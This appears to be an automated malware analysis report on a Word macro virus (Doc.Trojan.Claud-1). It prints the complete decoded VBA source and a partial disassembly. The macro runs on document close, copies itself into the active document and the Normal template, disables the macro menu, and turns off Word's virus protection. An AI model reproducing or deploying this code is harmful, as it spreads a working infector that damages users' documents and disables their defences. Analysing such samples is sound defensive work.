Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 5d9fe4373af6f4ab…

Verdict: MALICIOUS
File type: Office (OLE)

Size: 33.5 KB
Created: 2000-04-04 15:19:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: dcd31f58fe352d9bd5aae39ee794b34a
SHA-1: ce8b9303b80c3d534e6c227e570ebb256d4c1c8f
SHA-256: 5d9fe4373af6f4abf52bd37be8afd9e1a5e0a6551149cea44553a4053c718a22
Risk score: 140

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic

The sample is a malicious Office document containing VBA macros. The macro code runs from a Document_Close handler and attempts to infect both the active document and the Normal template by copying its own procedure from one VBA module to the other, indicating an attempt to establish persistence and spread to other documents. It also disables the Tools > Macro menu entry and Word's macro virus protection option. The ClamAV detection 'Doc.Trojan.Claud-1' further supports its malicious nature. The specific actions of copying code and saving the modified document and template are key indicators of its intent.

Heuristics (2)

  • ClamAV: Doc.Trojan.Claud-1 (severity: critical, rule: CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Trojan.Claud-1
  • VBA macros detected (severity: medium, rule: OLE_VBA_MACROS)
    Document contains VBA macro code

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 6057 bytes
SHA-256: 011ece025ee48151ec53480eda5c73a411bada77e1a2acdc5334d64d85d021d6
Detection: ClamAV: Doc.Trojan.Claud-1
Obfuscation or payload: unlikely

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Claudio2"
Attribute VB_Base = "1Normal.Claudio2"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_close()
On Error Resume Next
Dim jota As Integer, i As Integer, y As Integer, cadecodi As String
 Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
 Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
  CommandBars("tools").Controls("macro").Enabled = False
  Options.VirusProtection = False
  y = 0
  If AD.Name = "Claudio2" Then GoTo InfectNormal
  i = NT.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc)
Claudio:
  jota = 0
  jota = AD.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc)
  If jota = 0 Then
   jota = i
   Do While y < NT.CodeModule.ProcCountLines("Document_Close", vbext_pk_Proc)
     y = y + 1
     cadecodi = NT.CodeModule.Lines(jota, 1)
     AD.CodeModule.InsertLines y, cadecodi
     jota = jota + 1
   Loop
   AD.Name = "Claudio2"
   ActiveDocument.SaveAs ActiveDocument.FullName
  Else
    AD.CodeModule.ReplaceLine jota, "Sub Claudio"
    GoTo Claudio
  End If
 GoTo IYGH
InfectNormal:
If NT.Name <> "Claudio2" Then
i = AD.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc)
jota = 0
jota = NT.CodeModule.ProcBodyLine("Document_Close", vbext_pk_Proc)
  If jota = 0 Then
   jota = i
   Do While y < AD.CodeModule.ProcCountLines("Document_Close", vbext_pk_Proc)
     y = y + 1
     cadecodi = AD.CodeModule.Lines(jota, 1)
     NT.CodeModule.InsertLines y, cadecodi
     jota = jota + 1
   Loop
   NT.Name = "Claudio2"
   NormalTemplate.Save
  Else
    NT.CodeModule.ReplaceLine jota, "Sub Claudio"
    GoTo InfectNormal
  End If
 End If
IYGH:
'This is a V macro, made by c l a u d I o
'This is the beginning of the era of the V Claudio
End Sub

' Processing file: /opt/analyzer/scan_staging/260f1af8b51448bea567bd110463cb7c.bin
' ===============================================================================
' Module streams:
' Macros/VBA/Claudio2 - 3531 bytes
' Line #0:
' 	FuncDefn (Private Sub Document_close())
' Line #1:
' 	OnError (Resume Next) 
' Line #2:
' 	Dim 
' 	VarDefn jota (As Integer)
' 	VarDefn i (As Integer)
' 	VarDefn y (As Integer)
' 	VarDefn cadecodi (As String)
' Line #3:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld ActiveDocument 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set AD 
' Line #4:
' 	SetStmt 
' 	LitDI2 0x0001 
' 	Ld NormalTemplate 
' 	MemLd VBProject 
' 	MemLd VBComponents 
' 	ArgsMemLd Item 0x0001 
' 	Set NT 
' Line #5:
' 	LitVarSpecial (False)
' 	LitStr 0x0005 "macro"
' 	LitStr 0x0005 "tools"
' 	ArgsLd CommandBars 0x0001 
' 	ArgsMemLd Controls 0x0001 
' 	MemSt Enabled 
' Line #6:
' 	LitVarSpecial (False)
' 	Ld Options 
' 	MemSt VirusProtection 
' Line #7:
' 	LitDI2 0x0000 
' 	St y 
' Line #8:
' 	Ld AD 
' 	MemLd New 
' 	LitStr 0x0008 "Claudio2"
' 	Eq 
' 	If 
' 	BoSImplicit 
' 	GoTo InfectNormal 
' 	EndIf 
' Line #9:
' 	LitStr 0x000E "Document_Close"
' 	Ld vbext_pk_Proc 
' 	Ld NT 
' 	MemLd CodeModule 
' 	ArgsMemLd ProcBodyLine 0x0002 
' 	St i 
' Line #10:
' 	Label Claudio 
' Line #11:
' 	LitDI2 0x0000 
' 	St jota 
' Line #12:
' 	LitStr 0x000E "Document_Close"
' 	Ld vbext_pk_Proc 
' 	Ld AD 
' 	MemLd CodeModule 
' 	ArgsMemLd ProcBodyLine 0x0002 
' 	St jota 
' Line #13:
' 	Ld jota 
' 	LitDI2 0x0000 
' 	Eq 
' 	IfBlock 
' Line #14:
' 	Ld i 
' 	St jota 
' Line #15:
' 	Ld y 
' 	LitStr 0x000E "Document_Close"
' 	Ld vbext_pk_Proc 
' 	Ld NT 
' 	MemLd CodeModule 
' 	ArgsMemLd ProcCountLines 0x0002 
' 	Lt 
' 	DoWhile 
' Line #16:
' 	Ld y 
' 	LitDI2 0x0001 
' 	Add 
' 	St y 
' Line #17:
' 	Ld jota 
' 	LitDI2 0x0001 
' 	Ld NT 
' 	MemLd CodeModule 
' 	ArgsMemLd Lines 0x0002 
' 	St cadecodi 
' Line #18:
' 	Ld y 
' 	Ld cadecodi 
' 	Ld AD 
' 	MemLd CodeModule 
' 	ArgsMemCall InsertLines 0x0002 
' Line #19:
' 	Ld jota 
' 	LitDI2 0x0001 
' 	Add 
' 	St jota 
' Line #20:
' 	Loop 
' Line #21:
' 	LitStr 0x0008 "Claudio2"
' 	Ld AD 
' 	MemSt New 
' Line #22:
' 	Ld A
... (truncated)